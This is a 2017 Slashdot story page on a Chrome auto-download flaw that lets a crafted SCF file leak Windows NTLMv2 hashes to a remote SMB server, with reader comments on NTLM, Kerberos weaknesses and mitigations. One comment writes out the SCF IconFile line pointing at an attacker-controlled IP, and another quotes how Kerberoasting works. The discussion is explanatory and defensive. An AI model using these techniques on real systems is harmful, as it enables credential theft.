Stealing Windows Credentials Using Google Chrome (helpnetsecurity.com)

← Back to Stories (view on slashdot.org)

Stealing Windows Credentials Using Google Chrome (helpnetsecurity.com)

Posted by EditorDavid on Saturday May 20, 2017 @06:44AM from the browser-bugs dept.

Orome1 writes: A default setting in Google Chrome, which allows it to download files that it deems safe without prompting the user for a download location, can be exploited by attackers to mount a Windows credential theft attack using specially-crafted SCF shortcut files, DefenseCode researchers have found. What's more, for the attack to work, the victim does not even have to run the automatically downloaded file. Simply opening the download directory in Windows File Explorer will trigger the code icon file location inserted in the file to run, and it will send the victim's username, domain and NTLMv2 password hash to a remote SMB server operated by the attackers.

20 of 53 comments (clear)

Min score:

Reason:

Sort:

Firewall Blocked by darkain · 2017-05-20 07:03 · Score: 5, Informative

And this is EXACTLY why all of the LAN > WAN firewalls I manage have SMB/CIFS blocked. There is no reason to send that traffic over WAN. If it is needed for connection to a remote location, that's what a VPN connection is for.
1. Re:Firewall Blocked by jafiwam · 2017-05-20 23:27 · Score: 1
  
  NAT isn't a firewall, but most consumer routers at this point do have a stateful firewall.
  A NAT device will drop non-internally initiated connection attempts unless the user has opened up ports to the inside (not many do) and somehow messed it up.
  For purposes of this particular discussion, a NAT device can be lumped in with "firewall".
NTLM - the gift that keeps on giving by WaffleMonster · 2017-05-20 07:22 · Score: 1

I can't get over the fact in 2017 Microsoft has yet to incorporate a single secure authentication protocol into any of its operating systems. They haven't even tried.
It would be relatively trivial to select a PAKE and make it backwards compatible with existing NT hash databases. They just don't seem to care.
1. Re: NTLM - the gift that keeps on giving by WaffleMonster · 2017-05-20 07:41 · Score: 1
  
  they've been using kerberos since like 1999. NTLM is there for backwards compatibility
  KERBEROS IS NOT A SECURE AUTHENTICATION PROTOCOL.
  No there is nothing wrong my caps lock. I was intentionally shouting.
2. Re: NTLM - the gift that keeps on giving by clovis · 2017-05-20 09:25 · Score: 1
  
  they've been using kerberos since like 1999. NTLM is there for backwards compatibility
  KERBEROS IS NOT A SECURE AUTHENTICATION PROTOCOL.
  No there is nothing wrong my caps lock. I was intentionally shouting.
  Please explain using terms appropriate to an audience that understands authentication protocols.
3. Re: NTLM - the gift that keeps on giving by WaffleMonster · 2017-05-20 14:09 · Score: 2
  
  Different AC here; what are some examples of authentication protocols that you consider secure?
  Any PAKE with a zero knowledge proof...e.g. SRP, JPAKE.
  https://en.wikipedia.org/wiki/...
  Specifically with regards to MS-CHAPv2 and Kerberos to be secure it MUST NOT be possible to use material from authentication challenges or responses to conduct an offline brute force password guessing campaign because majority of user passwords are simply unable to withstand one.
  I consider an authentication protocol to be secure if it is able to meet all of the following requirements:
  1. Authenticating against an attacker places the user at zero risk.
  2. Mutual authentication... if login is successful it means trust relationship is bidirectional.
  3. Provides session keys for encrypting subsequent communication channel
  4. Secure against MITM
  5. Does not leak ANY knowledge that can be used for offline compromise
4. Re: NTLM - the gift that keeps on giving by WaffleMonster · 2017-05-20 17:20 · Score: 1
  
  --Hey motherfucker, citation needed.
  https://www.harmj0y.net/blog/p...
5. Re: NTLM - the gift that keeps on giving by buchanmilne · 2017-05-20 19:57 · Score: 1
  
  The problems here seem specific to Microsoft's implementation of Kerberos in their effort to retain backwards compatibility with NTLM.
  "If we have an arbitrary SPN that is registered for a domain user account, then the NTLM hash of that userâ(TM)s accountâ(TM)s plaintext password is used for the service ticket creation. This is the key to Kerberoasting."
  "Tim realized that because of this, and because part of a TGS requested for an SPN instance is encrypted with the NTLM hash of a service accountâ(TM)s plaintext password, any user can request these TGS tickets and then crack the service accountâ(TM)s plaintext password offline, without the risk of account lockout!"
  As far as I know, no other Kerberos implemenatation (MIT, Heimdal) does this, however it may be worthwhile checking if the Samba 4 KDC had to re-implement this for.compatibility reasons.
6. Re: NTLM - the gift that keeps on giving by buchanmilne · 2017-05-20 20:04 · Score: 2
  
  The Kereberos *protocol* does, as far as I know, satisfy these requirements.
  Can you provide any evidence of any implementation besides Microsoft's, not satisfying the requirements in a typical configuration?
  Yes, Microsoft's implementation of a Kerberos KDC seems to be broken due to having backwards-compatibility with NTLM, but that doesn't mean that the protocol itself is broken.
7. Re: NTLM - the gift that keeps on giving by Creepy · 2017-05-21 07:22 · Score: 1
  
  Yeah, AFAIK the Kerberos and IPsec protocols are secure. That doesn't mean the implementer didn't mess things up. I never heard any complaints about Kerberos on Linux and used it for years (albeit in the early 2000s, so not recently - for LDAP specifically). I've heard of multiple issues with it on Windows, though.
8. Re: NTLM - the gift that keeps on giving by WaffleMonster · 2017-05-21 09:49 · Score: 1
  
  The Kereberos *protocol* does, as far as I know, satisfy these requirements.
  Can you provide any evidence of any implementation besides Microsoft's, not satisfying the requirements in a typical configuration?
  The way people generally secure Kerberos is by deploying PKI (RFC4556) or using any number of widely available transport level privacy schemes. (IPsec, VPNs..etc) the very same options are widely available to shelter plaintext authentication.
  The problem is challenge response authentication algorithms provided with Kerberos themselves cannot stand alone. Kerberos cannot survive brute force attack without the communications channel first being protected by a foreign source of trust that isn't a password stored in a users mind.
  A good way of thinking about this is SSH. Most people are faced with a choice between being responsible and manually importing keys or just saying fuck it and taking that leap of faith first time they connect.
  There is a third option that allows you to have your cake (Not having to leap) and eat it too (not having to import keys) ... and that is a secure authentication protocol. Kerberos does not even pretend to provide this.
Not a browser problem by omnichad · 2017-05-20 08:20 · Score: 3, Insightful

This is a Windows problem, not a Chrome problem. Windows shouldn't be sending out credentials unless it knows they belong to the server it's authenticating with. This is like visiting a random web page on the Internet and Chrome helpfully filling in the login box with your bank username and password.
1. Re:Not a browser problem by Anonymous Coward · 2017-05-20 09:49 · Score: 1
  
  How is automatically downloading random files to peoples computers not a browser problem?
2. Re:Not a browser problem by jargonburn · 2017-05-20 16:04 · Score: 3, Insightful
  
  Simple: downloading this specially crafted .scf has absolutely no effect....until it is opened/parsed by the application "Windows Explorer". The vulnerability is in Explorer, not Chrome.
  It'd be like saying that downloading a specially crafted PDF file that will compromise your computer when it's opened is a browser problem. Well, since opening Explorer to your downloads folder is a bit more innocuous, it's a bit worse than that.
3. Re:Not a browser problem by Hank+the+Lion · 2017-05-20 23:20 · Score: 5, Informative
  
  Mod parent (and GGP) up.
  This is a Widows vulnerability in the way link files are handled, that is mischaracterised as a Chrome vulnerability by the author of the article.
  Link files (.LNK and .SCF as well as autorun.inf and maybe others) do not contain the pretty icon that is shown in Windows Explorer, but contain a link address to the file containing the icon.
  [Shell]
  IconFile=MyPic.ico, or
  IconFile=MyProgram.exe
  This is the case that was originally targeted by the developers of Windows.
  Then came network filesystems. Now, this would also work:
  IconFile=\\MyServer\Dir\MyProgram.exe, or even worse:
  IconFile=\\180.180.180.180\Dir\MyProgram.exe, where 180.180.180.180 is a server under control of the attacker.
  When connecting to a server, Windows helpfully sends your current login credentials, to prevent you from having to re-type them every time.
  Only when these do not work does it display a login prompt.
  The catch is, that, when you open the directory in which the file is stored in Explorer, the icon is needed for display, and the scf file specifies an icon file on a remote server. So, Explorer accesses the remote server, and the underlying network file system sends your login credentials.
  Google has tried to mitigate this problem by adding a .download extension to .LNK files, but had overlooked that .SCF can do exactly the same. Ultimately, this is not Google's fault. The Windows network system should not send login credentials to a server that the user hasn't authenticated to manually before, or should only use authentication mechanisms that are immune to replay attacks or brute forcing. See Wafflemonster's post above.
  This is an issue that should be addressed by Microsoft for once and for all at the filesystem level, not by browser makers with patchwork on a case-by-case basis.
4. Re:Not a browser problem by scdeimos · 2017-05-20 23:56 · Score: 2
  
  This is absolutely a Windows problem. It's Windows Explorer initiating the connection and it should *not* be doing that for any files that have a Zone.Identifier alternate data stream (i.e.: any file downloaded from the internet that hasn't yet had the Unblock button clicked in its Properties tab).
Credential sent silently by manu0601 · 2017-05-20 12:39 · Score: 1

Usually when one attempts to connect to a network share, credentials are prompted. Why is it different here? How does Windows decides what credentials should be sent to the attacker's SMB server?
Disable automatic downloading by CanEHdian · 2017-05-20 14:07 · Score: 1

Just disable automatic downloading by enabling the "ask every time" for the file location. That's a good idea anyway.

--
When the copyright term is "forever minus a day", live every day like it's the last.
Uh by The+MAZZTer · 2017-05-20 14:28 · Score: 1

This can happen with any browser if you configure it right. Once Chrome downloads the file it is in no way part of the process... depending on how exactly the SCF file works it might be considered a Windows bug and Microsoft's responsibility to fix (I didn't look at it too closely). Google will fix this on their end by blacklisting SCF files as dangerous to download, which they already do for many suspicious file types that you typically wouldn't be downloading. This will result in a warning prompt if you try to download such a file which requires a few extra clicks to override.
Won't work on my setup by swilver · 2017-05-21 03:30 · Score: 1

In my setup nothing is allowed internet access unless going through my proxy. Windows is not privy to what that proxy is... this effectively kills tons of exploits, and of course, Windows own spyware.
It does limit me to software that can be configured to use a proxy, but that doesn't really bother me.